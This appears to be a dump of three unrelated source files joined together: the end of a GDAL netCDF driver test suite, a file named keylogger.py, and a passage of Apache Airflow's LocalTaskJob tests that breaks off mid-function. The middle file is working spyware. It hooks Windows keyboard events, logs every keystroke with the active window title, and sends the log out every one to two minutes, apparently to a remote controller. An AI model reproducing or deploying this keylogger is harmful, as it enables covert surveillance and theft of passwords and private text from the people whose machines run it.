AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4267"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",-117],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AUTHORITY["EPSG","26711"]]"""
return tst.testOpen( check_prj = wkt )
###############################################################################
# test opening a vector ncdump file
def netcdf_76():
if gdaltest.netcdf_drv is None:
return 'skip'
if gdaltest.netcdf_drv.GetMetadataItem("ENABLE_NCDUMP") != 'YES':
return 'skip'
ds = ogr.Open('data/poly.nc.txt')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f is None or f.GetGeometryRef() is None:
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# test opening a raster file that used to be confused with a vector file (#6974)
def netcdf_77():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/fake_Oa01_radiance.nc')
subdatasets = ds.GetMetadata('SUBDATASETS')
if len(subdatasets) != 2 * 2:
gdaltest.post_reason('fail')
print(subdatasets)
return 'fail'
ds = gdal.Open('NETCDF:"data/fake_Oa01_radiance.nc":Oa01_radiance')
if len(ds.GetMetadata('GEOLOCATION')) != 0:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# test we handle correctly valid_range={0,255} for a byte dataset with
# negative nodata value
def netcdf_78():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/byte_with_valid_range.nc')
if ds.GetRasterBand(1).GetNoDataValue() != 240:
gdaltest.post_reason('fail')
return 'fail'
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('B' * 4, data)
if data != (128, 129, 126, 127):
gdaltest.post_reason('fail')
print(data)
return 'fail'
return 'success'
###############################################################################
# test we handle correctly _Unsigned="true" for a byte dataset with
# negative nodata value
def netcdf_79():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/byte_with_neg_fillvalue_and_unsigned_hint.nc')
if ds.GetRasterBand(1).GetNoDataValue() != 240:
gdaltest.post_reason('fail')
return 'fail'
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('B' * 4, data)
if data != (128, 129, 126, 127):
gdaltest.post_reason('fail')
print(data)
return 'fail'
return 'success'
###############################################################################
# Test creating and opening with accent
def netcdf_80():
if gdaltest.netcdf_drv is None:
return 'skip'
test = gdaltest.GDALTest( 'NETCDF', '../data/byte.tif', 1, 4672 )
return test.testCreateCopy(new_filename = 'test\xc3\xa9.nc', check_gt=0, check_srs=0, check_minmax = 0)
###############################################################################
# netCDF file in rotated_pole projection
def netcdf_81():
if gdaltest.netcdf_drv is None:
return 'skip'
ds = gdal.Open('data/rotated_pole.nc')
if ds.RasterXSize != 137 or ds.RasterYSize != 108:
gdaltest.post_reason('Did not get expected dimensions')
print(ds.RasterXSize)
print(ds.RasterYSize)
return 'fail'
projection = ds.GetProjectionRef()
expected_projection = """PROJCS["unnamed",GEOGCS["unknown",DATUM["unknown",SPHEROID["Spheroid",6367470,594.3130483479559]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433]],PROJECTION["Rotated_pole"],EXTENSION["PROJ4","+proj=ob_tran +o_proj=longlat +lon_0=18 +o_lon_p=0 +o_lat_p=39.25 +a=6367470 +b=6367470 +to_meter=0.0174532925199 +wktext"]]"""
if projection != expected_projection:
gdaltest.post_reason('Did not get expected projection')
print(projection)
return 'fail'
gt = ds.GetGeoTransform()
expected_gt = (-35.47, 0.44, 0.0, 23.65, 0.0, -0.44)
if max([abs(gt[i] - expected_gt[i]) for i in range(6)]) > 1e-3:
gdaltest.post_reason('Did not get expected geotransform')
print(gt)
return 'fail'
return 'success'
###############################################################################
# netCDF file with extra dimensions that are oddly indexed (1D variable
# corresponding to the dimension but with a differentn ame, no corresponding
# 1D variable, several corresponding variables)
def netcdf_82():
if gdaltest.netcdf_drv is None:
return 'skip'
with gdaltest.error_handler():
ds = gdal.Open('data/oddly_indexed_extra_dims.nc')
md = ds.GetMetadata()
expected_md = {
'NETCDF_DIM_extra_dim_with_var_of_different_name_VALUES': '{100,200}',
'NETCDF_DIM_EXTRA': '{extra_dim_with_several_variables,extra_dim_without_variable,extra_dim_with_var_of_different_name}',
'x#standard_name': 'projection_x_coordinate',
'NC_GLOBAL#Conventions': 'CF-1.5',
'y#standard_name': 'projection_y_coordinate',
'NETCDF_DIM_extra_dim_with_var_of_different_name_DEF': '{2,6}'
}
if md != expected_md:
gdaltest.post_reason('Did not get expected metadata')
print(md)
return 'fail'
md = ds.GetRasterBand(1).GetMetadata()
expected_md = {
'NETCDF_DIM_extra_dim_with_several_variables': '1',
'NETCDF_DIM_extra_dim_with_var_of_different_name': '100',
'NETCDF_DIM_extra_dim_without_variable': '1',
'NETCDF_VARNAME': 'data'
}
if md != expected_md:
gdaltest.post_reason('Did not get expected metadata')
print(md)
return 'fail'
return 'success'
###############################################################################
###############################################################################
# main tests list
gdaltest_list = [
netcdf_1,
netcdf_2,
netcdf_3,
netcdf_4,
netcdf_5,
netcdf_6,
netcdf_7,
netcdf_8,
netcdf_9,
netcdf_10,
netcdf_11,
netcdf_12,
netcdf_13,
netcdf_14,
netcdf_15,
netcdf_16,
netcdf_17,
netcdf_18,
netcdf_19,
netcdf_20,
netcdf_21,
netcdf_22,
netcdf_23,
netcdf_24,
netcdf_25,
netcdf_26,
netcdf_27,
netcdf_28,
netcdf_29,
netcdf_30,
netcdf_31,
netcdf_32,
netcdf_33,
netcdf_34,
netcdf_35,
netcdf_36,
netcdf_37,
netcdf_38,
netcdf_39,
netcdf_40,
netcdf_41,
netcdf_42,
netcdf_43,
netcdf_44,
netcdf_45,
netcdf_46,
netcdf_47,
netcdf_48,
netcdf_49,
netcdf_50,
netcdf_51,
netcdf_51_no_gdal_tags,
netcdf_52,
netcdf_53,
netcdf_54,
netcdf_55,
netcdf_56,
netcdf_57,
netcdf_58,
netcdf_59,
netcdf_60,
netcdf_61,
netcdf_62,
netcdf_62_ncdump_check,
netcdf_62_cf_check,
netcdf_63,
netcdf_63_ncdump_check,
netcdf_64,
netcdf_65,
netcdf_66,
netcdf_66_ncdump_check,
netcdf_67,
netcdf_68,
netcdf_69,
netcdf_70,
netcdf_71,
netcdf_72,
netcdf_73,
netcdf_74,
netcdf_75,
netcdf_76,
netcdf_77,
netcdf_78,
netcdf_79,
netcdf_80,
netcdf_81,
netcdf_82
]
###############################################################################
# basic file creation tests
init_list = [ \
('byte.tif', 1, 4672, None, []),
('byte_signed.tif', 1, 4672, None, ['PIXELTYPE=SIGNEDBYTE']),
('int16.tif', 1, 4672, None, []),
('int32.tif', 1, 4672, None, []),
('float32.tif', 1, 4672, None, []),
('float64.tif', 1, 4672, None, [])
]
# Some tests we don't need to do for each type.
item = init_list[0]
ut = gdaltest.GDALTest( 'netcdf', item[0], item[1], item[2], options=item[4] )
#test geotransform and projection
gdaltest_list.append( (ut.testSetGeoTransform, item[0]) )
gdaltest_list.append( (ut.testSetProjection, item[0]) )
#SetMetadata() not supported
#gdaltest_list.append( (ut.testSetMetadata, item[0]) )
# gdaltest_list = [ netcdf_1, netcdf_82 ]
# Others we do for each pixel type.
for item in init_list:
ut = gdaltest.GDALTest( 'netcdf', item[0], item[1], item[2], options=item[4] )
if ut is None:
print( 'GTiff tests skipped' )
gdaltest_list.append( (ut.testCreateCopy, item[0]) )
gdaltest_list.append( (ut.testCreate, item[0]) )
gdaltest_list.append( (ut.testSetNoDataValue, item[0]) )
###############################################################################
# other tests
if __name__ == '__main__':
gdaltest.setup_run( 'netcdf' )
gdaltest.run_tests( gdaltest_list )
#make sure we cleanup
gdaltest.clean_tmp()
gdaltest.summarize()
|
keylogger.py | import requests
import time
from threading import Thread
import pythoncom
import pyHook
import utils
from random import randint
from time import sleep
started = False
keylog = ""
current_window = ""
def OnKeyboardEvent(event):
global current_window
global keylog
if current_window != event.WindowName:
current_window = event.WindowName
keylog += "\n[%s] @@ %s|||" % (current_window, time.ctime())
key = ""
if event.Ascii == 27:
key = '[ESC]'
elif event.Ascii == 13:
key = "\n"
elif event.Ascii:
key = chr(event.Ascii)
keylog += key
return True
def keylogger():
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
def update():
global keylog
while True:
utils.send_output("{{KEYLOGS}}"+keylog)
delay = randint(60,120)
time.sleep(delay)
def run(action):
global started
global keylog
if action == "start":
if not started:
klg = Thread(target=keylogger)
klg.setDaemon(True)
klg.start()
updater = Thread(target=update)
updater.setDaemon(True)
updater.start()
started = True
else:
pass
elif action == "update":
# Storing Keystrokes
utils.send_output("{{KEYLOGS}}"+keylog)
|
test_local_task_job.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import os
import signal
import time
import uuid
from datetime import timedelta
from multiprocessing import Lock, Value
from unittest import mock
from unittest.mock import patch
import pytest
from airflow import settings
from airflow.exceptions import AirflowException, AirflowFailException
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.jobs.scheduler_job import SchedulerJob
from airflow.models.dagbag import DagBag
from airflow.models.taskinstance import TaskInstance
from airflow.operators.dummy import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.types import DagRunType
from tests.test_utils import db
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.config import conf_vars
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
@pytest.fixture
def clear_db():
db.clear_db_dags()
db.clear_db_jobs()
db.clear_db_runs()
db.clear_db_task_fail()
yield
@pytest.fixture(scope='class')
def clear_db_class():
yield
db.clear_db_dags()
db.clear_db_jobs()
db.clear_db_runs()
db.clear_db_task_fail()
@pytest.fixture(scope='module')
def dagbag():
return DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
@pytest.mark.usefixtures('clear_db_class', 'clear_db')
class TestLocalTaskJob:
@pytest.fixture(autouse=True)
def set_instance_attrs(self, dagbag):
self.dagbag = dagbag
with patch('airflow.jobs.base_job.sleep') as self.mock_base_job_sleep:
yield
def validate_ti_states(self, dag_run, ti_state_mapping, error_message):
for task_id, expected_state in ti_state_mapping.items():
task_instance = dag_run.get_task_instance(task_id=task_id)
task_instance.refresh_from_db()
assert task_instance.state == expected_state, error_message
def test_localtaskjob_essential_attr(self, dag_maker):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
with dag_maker('test_localtaskjob_essential_attr'):
op1 = DummyOperator(task_id='op1')
dr = dag_maker.create_dagrun()
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
assert all(check_result_1)
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
assert all(check_result_2)
def test_localtaskjob_heartbeat(self, dag_maker):
session = settings.Session()
with dag_maker('test_localtaskjob_heartbeat'):
op1 = DummyOperator(task_id='op1')
dr = dag_maker.create_dagrun()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
ti.task = op1
ti.refresh_from_task(op1)
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.process = mock.Mock()
with pytest.raises(AirflowException):
job1.heartbeat_callback()
job1.task_runner.process.pid = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
assert ti.pid != os.getpid()
job1.heartbeat_callback(session=None)
job1.task_runner.process.pid = 2
with pytest.raises(AirflowException):
job1.heartbeat_callback()
@mock.patch('airflow.jobs.local_task_job.psutil')
def test_localtaskjob_heartbeat_with_run_as_user(self, psutil_mock, dag_maker):
session = settings.Session()
with dag_maker('test_localtaskjob_heartbeat'):
op1 = DummyOperator(task_id='op1', run_as_user='myuser')
dr = dag_maker.create_dagrun()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.pid = 2
ti.hostname = get_hostname()
session.commit()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
ti.task = op1
ti.refresh_from_task(op1)
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.process = mock.Mock()
job1.task_runner.process.pid = 2
# Here, ti.pid is 2, the parent process of ti.pid is a mock(different).
# And task_runner process is 2. Should fail
with pytest.raises(AirflowException, match='PID of job runner does not match'):
job1.heartbeat_callback()
job1.task_runner.process.pid = 1
# We make the parent process of ti.pid to equal the task_runner process id
psutil_mock.Process.return_value.ppid.return_value = 1
ti.state = State.RUNNING
ti.pid = 2
# The task_runner process id is 1, same as the parent process of ti.pid
# as seen above
assert ti.run_as_user
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
# Here the task_runner process id is changed to 2
# while parent process of ti.pid is kept at 1, which is different
job1.task_runner.process.pid = 2
with pytest.raises(AirflowException, match='PID of job runner does not match'):
job1.heartbeat_callback()
@conf_vars({('core', 'default_impersonation'): 'testuser'})
@mock.patch('airflow.jobs.local_task_job.psutil')
def test_localtaskjob_heartbeat_with_default_impersonation(self, psutil_mock, dag_maker):
session = settings.Session()
with dag_maker('test_localtaskjob_heartbeat'):
op1 = DummyOperator(task_id='op1')
dr = dag_maker.create_dagrun()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.pid = 2
ti.hostname = get_hostname()
session.commit()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
ti.task = op1
ti.refresh_from_task(op1)
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.process = mock.Mock()
job1.task_runner.process.pid = 2
# Here, ti.pid is 2, the parent process of ti.pid is a mock(different).
# And task_runner process is 2. Should fail
with pytest.raises(AirflowException, match='PID of job runner does not match'):
job1.heartbeat_callback()
job1.task_runner.process.pid = 1
# We make the parent process of ti.pid to equal the task_runner process id
psutil_mock.Process.return_value.ppid.return_value = 1
ti.state = State.RUNNING
ti.pid = 2
# The task_runner process id is 1, same as the parent process of ti.pid
# as seen above
assert job1.task_runner.run_as_user == 'testuser'
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
# Here the task_runner process id is changed to 2
# while parent process of ti.pid is kept at 1, which is different
job1.task_runner.process.pid = 2
with pytest.raises(AirflowException, match='PID of job runner does not match'):
job1.heartbeat_callback()
def test_heartbeat_failed_fast(self):
"""
Test that task heartbeat will sleep when it fails fast
"""
self.mock_base_job_sleep.side_effect = time.sleep
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
with create_session() as session:
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = self.dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(
run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
assert len(heartbeat_records) > 2
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
# Assert that difference small enough
delta = (time2 - time1).total_seconds()
assert abs(delta - job.heartrate) < 0.5
@pytest.mark.quarantined
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dag = self.dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
assert State.RUNNING == ti.state
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
ti.refresh_from_db()
assert State.SUCCESS == ti.state
def test_localtaskjob_double_trigger(self):
dag = self.dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run, executor=SequentialExecutor())
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
assert ti.pid == 1
assert ti.state == State.RUNNING
session.close()
@pytest.mark.quarantined
def test_localtaskjob_maintain_heart_rate(self):
dag = self.dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(
run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session,
)
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run, executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
assert mock_start.call_count == 1
assert mock_ret_code.call_count == 2
time_end = time.time()
assert self.mock_base_job_sleep.call_count == 1
assert job1.state == State.SUCCESS
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
assert time_end - time_start < job1.heartrate
session.close()
def test_mark_failure_on_failure_callback(self, dag_maker):
"""
Test that ensures that mark_failure in the UI fails
the task, and executes on_failure_callback
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
def check_failure(context):
with failure_callback_called.get_lock():
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_failure'
assert context['exception'] == "task marked as failed externally"
def task_function(ti):
with create_session() as session:
assert State.RUNNING == ti.state
ti.log.info("Marking TI as failed 'externally'")
ti.state = State.FAILED
session.merge(ti)
session.commit()
time.sleep(10)
# This should not happen -- the state change should be noticed and the task should get killed
with task_terminated_externally.get_lock():
task_terminated_externally.value = 0
with dag_maker("test_mark_failure", start_date=DEFAULT_DATE):
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_failure_callback=check_failure,
)
dag_maker.create_dagrun()
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
with timeout(30):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callable above bigger
job1.run()
ti.refresh_from_db()
assert ti.state == State.FAILED
assert failure_callback_called.value == 1
assert task_terminated_externally.value == 1
@patch('airflow.utils.process_utils.subprocess.check_call')
@patch.object(StandardTaskRunner, 'return_code')
def test_failure_callback_only_called_once(self, mock_return_code, _check_call, dag_maker):
"""
Test that ensures that when a task exits with failure by itself,
failure callback is only called once
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
callback_count_lock = Lock()
def failure_callback(context):
with callback_count_lock:
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_failure_callback_race'
assert isinstance(context['exception'], AirflowFailException)
def task_function(ti):
raise AirflowFailException()
with dag_maker("test_failure_callback_race"):
task = PythonOperator(
task_id='test_exit_on_failure',
python_callable=task_function,
on_failure_callback=failure_callback,
)
dag_maker.create_dagrun()
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Simulate race condition where job1 heartbeat ran right after task
# state got set to failed by ti.handle_failure but before task process
# fully exits. See _execute loop in airflow/jobs/local_task_job.py.
# In this case, we have:
# * task_runner.return_code() is None
# * ti.state == State.Failed
#
# We also need to set return_code to a valid int after job1.terminating
# is set to True so _execute loop won't loop forever.
def dummy_return_code(*args, **kwargs):
return None if not job1.terminating else -9
mock_return_code.side_effect = dummy_return_code
with timeout(10):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callable above bigger
job1.run()
ti.refresh_from_db()
assert ti.state == State.FAILED # task exits with failure state
assert failure_callback_called.value == 1
def test_mark_success_on_success_callback(self, dag_maker):
"""
Test that ensures that where a task is marked success in the UI
on_success_callback gets executed
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
success_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def success_callback(context):
with shared_mem_lock:
success_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_success'
def task_function(ti):
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
with dag_maker(dag_id='test_mark_success', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}):
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_success_callback=success_callback,
)
session = settings.Session()
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
for _ in range(0, 25):
ti.refresh_from_db()
if ti.state == State.RUNNING:
break
time.sleep(0.2)
assert ti.state == State.RUNNING
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
ti.refresh_from_db()
process.join(timeout=10)
assert success_callback_called.value == 1
assert task_terminated_externally.value == 1
def test_task_sigkill_calls_on_failure_callback(self, dag_maker):
"""
Test that ensures that when a task is killed with sigkill
on_failure_callback gets executed
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def failure_callback(context):
with shared_mem_lock:
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_send_sigkill'
def task_function(ti):
os.kill(os.getpid(), signal.SIGKILL)
# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
with dag_maker(dag_id='test_send_sigkill'):
task = PythonOperator(
task_id='test_on_failure',
python_callable=task_function,
on_failure_callback=failure_callback,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
time.sleep(0.3)
process.join(timeout=10)
assert failure_callback_called.value == 1
assert task_terminated_externally.value == 1
def test_process_sigterm_calls_on_failure_callback(self, dag_maker):
"""
Test that ensures that when a task runner is killed with sigterm
on_failure_callback gets executed
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
failure_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def failure_callback(context):
with shared_mem_lock:
failure_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_failure'
def task_function(ti):
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
with dag_maker(dag_id='test_mark_failure', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}):
task = PythonOperator(
task_id='test_on_failure',
python_callable=task_function,
on_failure_callback=failure_callback,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
for _ in range(0, 25):
ti.refresh_from_db()
if ti.state == State.RUNNING:
break
time.sleep(0.2)
os.kill(process.pid, signal.SIGTERM)
ti.refresh_from_db()
process.join(timeout=10)
assert failure_callback_called.value == 1
assert task_terminated_externally.value == 1
@pytest.mark.parametrize(
"conf, dependencies, init_state, first_run_state, second_run_state, error_message",
[
(
{('scheduler', 'schedule_after_task_execution'): 'True'},
{'A': 'B', 'B': 'C'},
{'A': State.QUEUED, 'B': State.NONE, 'C': State.NONE},
{'A': State.SUCCESS, 'B': State.SCHEDULED, 'C': State.NONE},
{'A': State.SUCCESS, 'B': State.SUCCESS, 'C': State.SCHEDULED},
"A -> B -> C, with fast-follow ON when A runs, B should be QUEUED. Same for B and C.",
),
(
{('scheduler', 'schedule_after_task_execution'): 'False'},
{'A': 'B', 'B': 'C'},
{'A': State.QUEUED, 'B': State.NONE, 'C': State.NONE},
{'A': State.SUCCESS, 'B': State.NONE, 'C': State.NONE},
None,
"A -> B -> C, with fast-follow OFF, when A runs, B shouldn't be QUEUED.",
),
(
{('scheduler', 'schedule_after_task_execution'): 'True'},
{'A': 'B', 'C': 'B', 'D': 'C'},
{'A': State.QUEUED, 'B': State.NONE, 'C': State.NONE, 'D': State.NONE},
{'A': State.SUCCESS, 'B': State.NONE, 'C': State.NONE, 'D': State.NONE},
None,
"D -> C -> B & A -> B, when A runs but C isn't QUEUED yet, B shouldn't be QUEUED.",
),
(
{('scheduler', 'schedule_after_task_execution'): 'True'},
{'A': 'C', 'B': 'C'},
{'A': State.QUEUED, 'B': State.FAILED, 'C': State.NONE},
{'A': State.SUCCESS, 'B': State.FAILED, 'C': State.UPSTREAM_FAILED},
None,
"A -> C & B -> C, when A is QUEUED but B has FAILED, C is marked UPSTREAM_FAILED.",
),
],
)
def test_fast_follow(
self, conf, dependencies, init_state, first_run_state, second_run_state, error_message, dag_maker
):
with conf_vars(conf):
session = settings.Session()
python_callable = lambda: True
with dag_maker('test_dagrun_fast_follow') as dag:
task_a = PythonOperator(task_id='A', python_callable=python_callable)
task_b = PythonOperator(task_id='B', python_callable=python_callable)
task_c = PythonOperator(task_id='C', python_callable=python_callable)
if 'D' in init_state:
task_d = PythonOperator(task_id='D', python_callable=python_callable)
for upstream, downstream in dependencies.items():
dag.set_dependency(upstream, downstream)
scheduler_job = SchedulerJob(subdir=os.devnull)
scheduler_job.dagbag.bag_dag(dag, root_dag=dag)
dag_run = dag.create_dagrun(run_id='test_dagrun_fast_follow', state=State.RUNNING)
task_instance_a = TaskInstance(task_a, dag_run.execution_date, init_state['A'])
task_instance_b = TaskInstance(task_b, dag_run.execution_date, init_state['B'])
task_instance_c = TaskInstance(task_c, dag_run.execution_date, init_state['C'])
if 'D' in init_state:
task_instance_d = TaskInstance(task_d, dag_run.execution_date, init_state['D'])
session.merge(task_instance_d)
session.merge(task_instance_a)
session.merge(task_instance_b)
session.merge(task_instance_c)
session.flush()
job1 = LocalTaskJob(
task_instance=task_instance_a, ignore_ti_state=True, executor=SequentialExecutor()
)
job1.task_runner = StandardTaskRunner(job1)
job2 = LocalTaskJob(
task_instance=task_instance_b, ignore_ti_state=True, executor=SequentialExecutor()
)
job2.task_runner = StandardTaskRunner(job2)
settings.engine.dispose()
job1.run()
self.validate_ti_states(dag_run, first_run_state, error_message)
if second_run_state:
job2.run()
self.validate_ti_states(dag_run, second_run_state, error_message)
if scheduler_job.processor_agent:
scheduler_job.processor_agent.end()
@pytest.mark.quarantined
def test_task_sigkill_works_with_retries(self, dag_maker):
"""
Test that ensures that tasks are retried when they receive sigkill
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
retry_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def retry_callback(context):
with shared_mem_lock:
retry_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_failure_2'
def task_function(ti):
os.kill(os.getpid(), signal.SIGKILL)
